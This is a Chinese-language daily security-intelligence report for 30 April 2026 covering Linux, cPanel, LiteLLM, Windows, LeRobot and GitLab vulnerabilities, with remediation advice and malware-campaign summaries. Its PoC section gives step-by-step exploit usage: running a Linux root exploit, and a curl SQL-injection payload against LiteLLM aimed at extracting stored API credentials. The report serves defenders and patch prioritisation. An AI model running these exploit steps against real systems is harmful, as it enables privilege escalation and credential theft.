每日安全情报报告 · 2026-04-30

每日安全情报报告 · 2026-04-30

报告日期 :2026年04月30日 | 风险等级汇总 :🔴 严重×4 🟠 高危×2
本期焦点:Linux 内核 "Copy Fail" 零日全版本通杀 / cPanel 认证绕过在野利用 / Windows Shell 零点击哈希窃取 CISA 预警 / AI 网关 LiteLLM SQL 注入 36 小时内遭实战利用


一、高危漏洞速报

🔴 CVE-2026-31431 --- Linux 内核 "Copy Fail" 本地提权(LPE)

属性 详情
漏洞类型 内核逻辑缺陷 / 本地权限提升 (LPE) / 容器逃逸
受影响组件 Linux Kernel(authencesn 模块,AF_ALG + splice() 链式调用)
CVSS 评分 9.8(严重)
披露日期 2026-04-29
发现者 Xint Code(Theori 公司)
在野利用 ⚠️ POC 已公开,漏洞静默存在近 10 年

漏洞描述authencesn 加密模块中存在直线型逻辑缺陷,攻击者通过组合 AF_ALG 套接字与 splice() 系统调用,可实现 4 字节页缓存(page-cache)任意写入,进而篡改 setuid 二进制文件,最终获取 root shell。无需竞态条件,732 字节 Python 脚本即可通杀 2017 年以来所有主流 Linux 发行版(Ubuntu、Amazon Linux、RHEL、SUSE、Debian、Arch 等)。

影响范围

  • Ubuntu 24.04 LTS / Amazon Linux 2023 / RHEL 10.1 / SUSE 16 及以上发行版

  • 所有使用默认内核配置(AF_ALG 默认启用)的 Linux 系统

  • 可用于 容器逃逸,威胁多租户云环境

修复建议

  1. 升级内核至包含主线提交 a664bf3d603d 的版本

  2. 临时缓解:禁用 algif_aead 模块
    bash echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf rmmod algif_aead 2>/dev/null || true

  3. 容器/沙箱环境通过 seccomp 限制 AF_ALG 套接字创建

🔗 NVD 漏洞详情 | 官方披露页面 | 腾讯云安全通告


🔴 CVE-2026-41940 --- cPanel & WHM 认证绕过(已在野利用)

属性 详情
漏洞类型 CRLF 注入 / 认证绕过
受影响组件 cPanel & WHM(v11.110.x ~ v11.136.x)/ WP Squared
CVSS 评分 9.8(严重)
披露日期 2026-04-28
在野利用 ⚠️ 已确认在野利用,疑似零日活动始于 2026-02-23

漏洞描述 :cPanel 守护进程 cpsrvd 在认证发生之前将新会话写入磁盘,且未对用户输入进行消毒处理。攻击者可通过恶意构造的 Basic Authorization 头注入原始 \r\n 字符,在会话文件中插入任意属性(如 user=root),触发会话重新加载后获得管理员级访问权限,全程无需有效凭证。Shodan 显示约 150 万个 cPanel 实例暴露于互联网。

受影响版本与修复版本

受影响版本 修复版本
cPanel & WHM 11.110.0 < 11.110.0.97 11.110.0.97
cPanel & WHM 11.126.0 < 11.126.0.54 11.126.0.54
cPanel & WHM 11.134.0 < 11.134.0.20 11.134.0.20
cPanel & WHM 11.136.0 < 11.136.0.5 11.136.0.5
WP Squared 11.136.1 < 11.136.1.7 11.136.1.7

修复建议:立即升级至官方修复版本;临时措施可封堵 TCP 2083(cPanel)和 2087(WHM)端口。

🔗 Rapid7 分析报告 | watchTowr 技术分析 | cPanel 官方安全公告


🔴 CVE-2026-42208 --- LiteLLM AI 网关预认证 SQL 注入(36 小时内在野利用)

属性 详情
漏洞类型 SQL 注入 / 预认证
受影响组件 BerriAI LiteLLM(v1.81.16 ~ v1.83.6)
CVSS 评分 9.3(严重)
披露日期 2026-04-29
在野利用 ⚠️ CVE 公开后 36 小时内发现在野利用

漏洞描述:LiteLLM 代理在 API 密钥验证流程中,将调用者提供的密值直接混入 SQL 查询文本而非参数化处理。攻击者无需任何认证,仅需在请求头注入 SQL 语法即可操纵数据库查询:

http 复制代码
Authorization: Bearer ' OR '1'='1' --

由于 LiteLLM 通常作为 AI 网关集中管理 OpenAI、Anthropic、AWS Bedrock 等多家服务商凭证,成功利用可导致:云端 AI API 密钥批量窃取、财务损失(攻击者滥用高价值 API)及云基础设施横向移动。

修复建议

bash 复制代码
pip install --upgrade litellm==1.83.7

无法立即升级时,临时设置 disable_error_logs: true

🔗 Vulert 详细分析 | Sysdig 威胁研究 | FreeBuf 报道


🔴 CVE-2026-32202 --- Windows Shell 欺骗漏洞(CISA 紧急预警,零点击)

属性 详情
漏洞类型 NTLM 强制认证 / 欺骗漏洞(零点击)
受影响组件 Windows Shell(Windows 10/11 全系列 + Windows Server)
CVSS 评分 待 NVD 更新(高危)
披露日期 2026-04-14(补丁发布) / 2026-04-29(CISA 确认在野利用)
在野利用 ⚠️ CISA 确认在野利用,已加入 KEV 目录

漏洞描述 :本漏洞为 CVE-2026-21510 的不完整补丁绕过 。受害者仅需在 Windows 资源管理器中打开包含恶意 LNK 文件的文件夹(无需点击),Explorer 在渲染图标时自动发起 SMB 连接至攻击者服务器,触发 NTLM 认证握手,泄露 Net-NTLMv2 哈希。攻击者可利用哈希进行 NTLM 中继攻击或离线破解,实现横向移动。

关键时间线 :4月14日微软发布补丁时未标记"已被利用",导致大量组织未优先修复,两周后 CISA 确认漏洞被活跃利用。

修复建议:立即安装 2026-04-14 微软补丁;网络层封堵出站 SMB(445/TCP)流量;限制 NTLM 在内网的使用范围。

🔗 CISA KEV 目录 | Help Net Security 分析 | The Hacker News 报道


🟠 CVE-2026-25874 --- Hugging Face LeRobot 未修复 RCE(无需认证)

属性 详情
漏洞类型 Pickle 反序列化 / 远程代码执行
受影响组件 Hugging Face LeRobot(近 24,000 GitHub Stars,暂无修复版本)
CVSS 评分 9.8(严重)
披露日期 2026-04-28
补丁状态 尚未修复,官方正在评估

漏洞描述:LeRobot 异步推理架构中存在"无认证 gRPC + 不安全 Pickle 反序列化"危险组合(CVE-2026-25874)。攻击者可通过发送特制的 gRPC 请求,触发 Pickle 反序列化链,在目标机器上执行任意代码,无需任何凭证。广泛用于 AI 驱动的机器人研究场景,一旦被利用可导致实验室/生产机器人系统被完全接管。

🔗 The Hacker News 报道 | CSDN 分析 | NVD 详情


🟠 CVE-2026-1868 --- GitLab AI Gateway 模板注入 RCE

属性 详情
漏洞类型 模板注入 / 拒绝服务 / 远程代码执行
受影响组件 GitLab Duo Self-Hosted AI Gateway(v18.1.6 ~ v18.8.0)
CVSS 评分 9.9(严重)
披露日期 2026-02-08(持续关注中)

漏洞描述:GitLab Duo Workflow Service 在处理用户提供的 Agent Platform Flow 定义时,未对模板内容进行充分过滤,导致模板注入漏洞。在最坏情况下可实现网关层面的远程代码执行(RCE),亦可触发拒绝服务,影响所有部署自托管 AI Gateway 的 GitLab 企业用户。

🔗 FreeBuf 分析 | 阿里云 AVD 详情 | GitLab 安全公告


二、漏洞 PoC 速递

PoC 1:CVE-2026-31431 "Copy Fail" --- 732 字节 Python 脚本通杀所有 Linux

来源 :Theori(Xint Code 团队)
GitHub 仓库theori-io/copy-fail-CVE-2026-31431
风险等级:🔴 严重(直接获取 root shell,无需竞态条件)

利用原理 :通过 AF_ALG 套接字与 splice() 系统调用的组合,实现对 /usr/bin/su 等 setuid 二进制文件的页缓存(page-cache)任意写入,篡改后直接执行获取 root 权限。

使用步骤(⚠️ 仅限授权渗透测试环境):

bash 复制代码
# Step 1: 克隆 PoC 仓库
git clone https://github.com/theori-io/copy-fail-CVE-2026-31431.git
cd copy-fail-CVE-2026-31431

# Step 2: 确认 Python 版本(需 Python 3.10+,仅需标准库)
python3 --version

# Step 3: 执行漏洞利用(默认目标:/usr/bin/su)
python3 copy_fail_exp.py
# 可选:指定其他 setuid 二进制作为目标
# python3 copy_fail_exp.py /usr/bin/passwd

# Step 4: 脚本执行完毕后,运行 su 获取 root shell
su -
# id → uid=0(root)

技术细节

  • 脚本仅 732 字节,依赖标准库(os, socket, zlib

  • 利用 algif_aead 内核模块的逻辑缺陷

  • 写入不持久(重启后恢复),但 root shell 真实有效

  • 可作为容器逃逸原语(container escape primitive)

🔗 PoC 仓库 | Bugcrowd 技术分析 | ByteIota 详细解析


PoC 2:CVE-2026-42208 LiteLLM --- 预认证 SQL 注入复现环境

来源 :imjdl
GitHub 仓库imjdl/CVE-2026-42208_lab
风险等级:🔴 严重(无需认证,可窃取 AI 平台凭证)

利用原理:LiteLLM 代理在处理 API 密钥验证时未使用参数化查询,攻击者可通过构造恶意 Authorization 头实施 SQL 注入,读取数据库中存储的所有 AI 服务商 API 密钥。

使用步骤(⚠️ 仅限授权渗透测试环境):

bash 复制代码
# Step 1: 克隆 PoC 复现实验室
git clone https://github.com/imjdl/CVE-2026-42208_lab.git
cd CVE-2026-42208_lab

# Step 2: 安装依赖并启动靶机环境
pip install -r requirements.txt
docker-compose up -d  # 或按 README 说明部署

# Step 3: 执行注入测试(向 /chat/completions 端点发送)
curl -X POST http://TARGET:4000/chat/completions \
  -H "Authorization: Bearer ' OR '1'='1' --" \
  -H "Content-Type: application/json" \
  -d '{"model": "gpt-4", "messages": [{"role": "user", "content": "test"}]}'

# Step 4: 利用 SQL 注入提取凭证表数据
# 目标表:litellm_credentials.credential_values / litellm_config

实战特征 :攻击者已表现出对 LiteLLM 数据库结构的了解,初步探测后定向访问 /key/generate/key/info 等密钥管理端点,尝试将数据库读权限转化为代理控制权。

🔗 PoC 仓库 | Sysdig 威胁分析 | Vulert 详细报告


PoC 3:CVE-2026-41940 cPanel --- 认证绕过 Session 检测工具

来源 :debugactiveprocess(基于 watchTowr 分析)
GitHub 仓库debugactiveprocess/cPanel-WHM-AuthBypass-Session-Checker
风险等级:🔴 严重(可获取任意 cPanel 账户管理员权限)

使用步骤(⚠️ 仅限授权资产检测):

bash 复制代码
# Step 1: 克隆 Session 检测工具
git clone https://github.com/debugactiveprocess/cPanel-WHM-AuthBypass-Session-Checker.git
cd cPanel-WHM-AuthBypass-Session-Checker

# Step 2: 安装 Python 依赖
pip install -r requirements.txt

# Step 3: 对目标 cPanel 实例进行会话绕过检测
python3 session_checker.py --target https://TARGET:2087 --check

# Step 4: 输出结果会显示目标是否存在会话验证缺陷
# 若确认漏洞,立即应用官方补丁(升级至修复版本)

技术要点 :通过省略 whostmgrsession Cookie 的预期字段并注入 CRLF 序列,在服务器端会话文件中写入 user=root 等任意属性,触发 cpsrvd 重新加载会话时获得管理员权限。

🔗 Session 检测工具 | watchTowr 分析 | Rapid7 ETR


三、安全圈动态

📰 文章一:朝鲜 Lazarus APT 推出 "Mach-O Man" macOS 四阶段恶意软件套件

来源 :GBHackers On Security(Mayura Kathir,2026-04-29)
标签:APT / 供应链攻击 / macOS / 加密货币

朝鲜国家级 APT 组织 Lazarus Group 推出新型 macOS 恶意软件套件 "Mach-O Man" ,采用 ClickFix 社会工程手法,通过 Telegram 冒充同事发送虚假 Zoom/Teams 会议邀请,诱导金融科技和加密货币企业高管手动复制执行终端命令。攻击链共分四阶段:初始 stager(teamsSDK.bin)→ 系统信息收集(D1YrHRTg.bin)→ macOS Keychain 及浏览器凭证窃取(macrasv2)→ 持久化(minst2.bin 伪装 OneDrive 注册 LaunchAgent)。本次活动已导致多家金融科技公司的 Keychain 密钥和加密货币钱包凭证泄露。

🔗 阅读原文


📰 文章二:"Mini Shai-Hulud" SAP npm 供应链攻击:220 万月下载包遭投毒

来源 :The Hacker News(2026-04-30)/ Snyk 安全团队
标签:供应链攻击 / npm / SAP / CI/CD 凭证窃取

安全研究人员披露一起自我命名为 "Mini Shai-Hulud" 的 npm 供应链攻击活动。攻击者篡改了 4 个 SAP CAP 生态系统相关 npm 包(月下载量超 220 万),注入混淆的预安装脚本(基于 Bun 运行时),在包安装时静默执行并窃取开发者环境变量、CI/CD secrets 及 API 密钥。OX Security 研究显示,相关凭证已泄露至超过 1,200 个代码仓库。建议立即审查项目依赖、轮换暴露凭证,并启用 npm audit 和依赖完整性校验。

🔗 The Hacker News 报道 | Snyk 技术分析 | OX Security 详情


📰 文章三:深度分析 Sorry 勒索软件的加密实现与行为特征

来源 :安全客 / 360(2026-04-29)
标签:勒索软件 / 加密分析 / 恶意软件逆向

安全研究人员对新型勒索软件 "Sorry" 进行深度剖析,重点揭示其底层加密实现机制和网络行为特征。该勒索软件采用混合加密策略,结合 AES-256 对称加密和 RSA 非对称密钥保护方案,具备快速文件遍历能力和网络传播组件。文章包含对其 C2 通信模式、文件加密范围选择逻辑及持久化机制的详细技术分析,为企业建立针对性检测规则提供参考。

🔗 安全客原文


📰 文章四:CISA 发出紧急预警 --- Windows Shell 零点击漏洞 CVE-2026-32202 正被活跃利用

来源 :Help Net Security(Zeljka Zorz,2026-04-29)
标签:CISA / Windows / NTLM / 零日

CISA 将 CVE-2026-32202 加入已知利用漏洞(KEV)目录,并要求联邦机构限期修复。该漏洞为 CVE-2026-21510 不完整补丁绕过,受害者仅需打开含恶意 LNK 的文件夹,Windows Explorer 即自动建立 SMB 连接泄露 NTLMv2 哈希,APT28 等高级威胁行为者已将该技术纳入武器库。此案例再次警示:补丁管理中"已利用"标记的滞后可导致大量组织未优先响应。

🔗 阅读原文 | The Register 分析 | CISA KEV 目录


📰 文章五:AI 时代的安全新风险 --- Cursor AI 扩展权限漏洞与 LeRobot RCE 双重曝光

来源 :Cyber Security News / The Hacker News(2026-04-30)
标签:AI 安全 / 开发者工具 / RCE / 访问控制

2026年4月30日,两项 AI 工具高危漏洞同日曝光:其一,广泛使用的 AI 编程环境 Cursor 被发现访问控制漏洞(CVSS 8.2),任何已安装的扩展均可获取开发者令牌,导致完整凭证被窃;其二,Hugging Face 开源机器人学习框架 LeRobot(CVE-2026-25874,CVSS 9.8)存在尚未修复的 gRPC + Pickle 反序列化组合 RCE 漏洞,无需认证即可在目标机上执行任意代码。两起事件共同揭示 AI 工具生态链安全审查不足的系统性风险。

🔗 The Hacker News LeRobot 报道 | Cursor 漏洞分析 | CVE-2026-25874 详情


四、风险处置优先级建议

优先级 CVE / 事件 建议行动 截止时间
🔴 P0 CVE-2026-31431 Linux 内核 Copy Fail 升级内核 / 临时禁用 algif_aead 立即
🔴 P0 CVE-2026-41940 cPanel 认证绕过 升级至修复版本 / 封堵 2083/2087 端口 立即
🔴 P0 CVE-2026-32202 Windows Shell 零点击 安装 4月14日补丁 / 封堵出站 SMB 24h 内
🔴 P0 CVE-2026-42208 LiteLLM SQL 注入 升级 litellm==1.83.7 立即
🟠 P1 CVE-2026-25874 LeRobot RCE(未修复) 隔离 gRPC 端口 / 关注官方补丁 48h 内
🟠 P1 SAP npm 供应链投毒 审查依赖 / 轮换 CI/CD 凭证 24h 内
🟡 P2 Lazarus Mach-O Man(macOS) 排查 LaunchAgent / 审计 Terminal 使用 本周

本报告由自动化安全情报系统生成,信息来源:NVD / CISA KEV / The Hacker News / FreeBuf / 安全客 / GBHackers / Rapid7 / Snyk / GitHub。所有 PoC 信息仅供授权安全研究使用,请遵守相关法律法规。

相关推荐
SuperherRo6 小时前
服务攻防-Java组件安全&Solr搜索&Shiro鉴权&Log4j日志&JDK高版本绕过&CVE历史漏洞
java·log4j·solr·shiro·cve
南行*6 小时前
Intel Pin 插桩
安全·网络安全
Le_ee6 小时前
winXP栈溢出漏洞深度学习
网络安全·安全性测试·栈溢出·ollydbg
一名优秀的码农7 小时前
vulhub系列-82-doubletrouble: 1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
一个脚本boy7 小时前
【渗透测试中收集信息命令并利用漏洞与提权命令总结基础版(适合新手入门学习渗透测试)】
学习·web安全·网络安全
一名优秀的码农7 小时前
vulhub系列-81-Os-hackNos-3(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
2401_873479401 天前
企业安全团队如何配合公安协查?IP查询在电子取证中的技术实践
tcp/ip·安全·网络安全·php
网安情报局1 天前
如何选择合适的AI大模型:快快云安全AI大模型聚合平台全解析
人工智能·网络安全·ai大模型
忡黑梨1 天前
eNSP_从直连到BGP全网互通
c语言·网络·数据结构·python·算法·网络安全